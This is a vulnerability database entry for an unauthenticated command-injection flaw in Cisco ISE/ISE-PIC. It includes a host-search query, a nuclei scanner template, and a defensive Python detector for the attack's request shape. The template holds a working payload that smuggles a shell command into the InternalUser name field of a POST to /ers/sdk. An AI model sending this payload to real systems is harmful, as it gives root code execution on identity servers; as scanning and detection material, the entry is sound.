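Vulnerability information
Vulnerability name: Cisco ISE/ISE-PIC Unauthenticated Remote Code Execution Vulnerability
Vulnerability ID:
Vulnerability type: Command execution
Severity: Critical
Description: Cisco ISE (Identity Services Engine) and ISE-PIC are identity services engine products from Cisco, widely used for authentication, authorization and auditing services in enterprise networks. They are typically deployed in enterprise-grade networks to manage network access control and policy enforcement. Because they are so widely deployed, security vulnerabilities in these products can pose a serious threat to a large number of enterprise networks. This vulnerability is caused by insufficient validation of user-supplied input in a specific API, which allows an unauthenticated remote attacker to execute arbitrary code with root privileges. It is a command execution vulnerability whose technical root cause is that the application fails to adequately validate and sanitize user input, allowing an attacker to inject malicious commands. Because an attacker can exploit it without authentication and can execute arbitrary code, the attacker can take full control of an affected system, leading to data leakage, service disruption or other malicious activity. The severity of this vulnerability lies in its high exploitability and potentially large-scale impact, especially in enterprise networks.
Vendor: Cisco
Product name: Cisco ISE/ISE-PIC
Search syntax: html:"Identity Services Engine"
Source: https://github.com/projectdiscovery/nuclei-templates/blob/fd14b07079f553ea291a76f371f11c7966323c4a/http%2Fcves%2F2025%2FCVE-2025-20281.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details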
```yaml
id: CVE-2025-20281

info:
  name: Cisco ISE/ISE-PIC - Unauthenticated Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Cisco ISE and Cisco ISE-PIC contain a remote code execution vulnerability caused by insufficient validation of user-supplied input in a specific API, allowing unauthenticated remote attackers to execute arbitrary code as root.
  reference:
    - https://github.com/abrewer251/CVE-2025-20281-2-Cisco-ISE-RCE
    - https://github.com/grupooruss/CVE-2025-20281-Cisco
  metadata:
    shodan-query: html:"Identity Services Engine"
  tags: cve,cve2025,cisco,ise,rce,unauth

variables:
  cmd: "id"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /admin/login.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - status_code == 200 && contains(body, "document.title =\'Identity Services Engine\';")
          - status_code == 403 && contains(body, "<title>Identity Services Engine</title>")

  - raw:
      - |
        POST /ers/sdk
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        Connection: close

        {
          "InternalUser": {
            "name": "pwn; {{cmd}}; #",
            "password": "x",
            "changePassword": false
          }
        }

    matchers:
      - type: dsl
        dsl:
          - regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)
          - status_code == 200
        condition: and
```
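A defender-side check for the request shape the template above sends, added here as an example (it is not part of the template or of any Cisco code): it flags POST requests to /ers/sdk whose JSON string fields carry shell metacharacters. The function names, the metacharacter set and the choice to skip password fields are assumptions, and the sample requests are constructed.

```python
import json
import re

# Endpoint taken from the template on this page.
WATCHED_PATH = "/ers/sdk"
# Assumption: characters a POSIX shell interprets and an account name never needs.
SHELL_META = re.compile(r"[;&|`$<>\\\n\r#(){}]")
# Assumption: secrets may legitimately contain these characters, so skip them.
SKIP_KEYS = {"password"}


def iter_strings(node, path=""):
    """Yield (json_path, value) for every string in a decoded JSON body."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key.lower() not in SKIP_KEYS:
                yield from iter_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def inspect_request(method, path, body):
    """Return findings for one captured request; an empty list means clean."""
    if method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != WATCHED_PATH:
        return []
    try:
        decoded = json.loads(body)
    except (ValueError, TypeError):
        return [("<body>", "unparsable JSON")]  # worth a look on this endpoint
    findings = []
    for json_path, value in iter_strings(decoded):
        hit = SHELL_META.search(value)
        if hit:
            findings.append((json_path, f"shell metacharacter {hit.group()!r}"))
    return findings


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "/ers/sdk", '{"InternalUser": {"name": "pwn; id; #", "password": "x", "changePassword": false}}'),
    ("POST", "/ers/sdk", '{"InternalUser": {"name": "jsmith", "password": "x", "changePassword": false}}'),
    ("GET", "/admin/login.jsp", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, inspect_request(method, path, body) or "clean")
```

The same predicate can be applied to request bodies logged by a reverse proxy or WAF in front of the ISE API.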